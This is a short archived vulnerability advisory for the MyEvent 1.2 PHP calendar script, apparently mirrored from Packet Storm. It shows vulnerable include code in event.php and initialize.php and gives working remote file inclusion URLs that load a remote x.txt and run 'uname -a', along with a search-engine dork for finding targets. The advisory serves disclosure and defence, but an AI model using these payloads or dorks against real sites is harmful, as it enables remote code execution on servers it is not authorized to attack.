Lucene search
K

MyEvent-1.2.txt

🗓️ 19 Apr 2006 00:00:00Reported by Andries BruinsmaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 35 Views

The MyEvent script version 1.2 on http://mywebland.com is at high risk of remote code execution through "event.php" and "initialize.php

Code
`Website : http://mywebland.com/  
Script : MyEvent   
Version : 1.2  
Risk : High  
Class : Remote   
Credits : b3g0k,Nistiman,flot,Netqurd etc.. my forget other friends  
Google look for :) = "MyEvent 1.2 " or "/calendar/myevent.php"  
  
I. Remote Code Execution   
  
This is script to very big high it bug being found.   
  
"Event.php" remote code execution :  
  
global $myevent_path;  
  
include_once $myevent_path."includes/template.php";  
$template = new Template($myevent_path."templates/") ;  
$template->set_filenames(array(  
'event' => 'event.tpl',  
?>  
  
Did you see the "myevent_path" :)   
  
  
http://www.site.com/[path]/event.php?myevent_path=http://www.site.com/x.txt?&cmd=uname -a  
  
"İnitialize.php" Remote Code :  
  
include $myevent_path."config.php";  
include $myevent_path.$language;  
include_once $myevent_path."includes/template.php" ;  
  
$db = mysql_connect($host,$login,$password);  
mysql_select_db($base,$db);  
>  
  
Yep now code  
  
http://www.site.com/[path]/initialize.php?myevent_path=http://www.site.com/x.txt?&cmd=uname -a  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation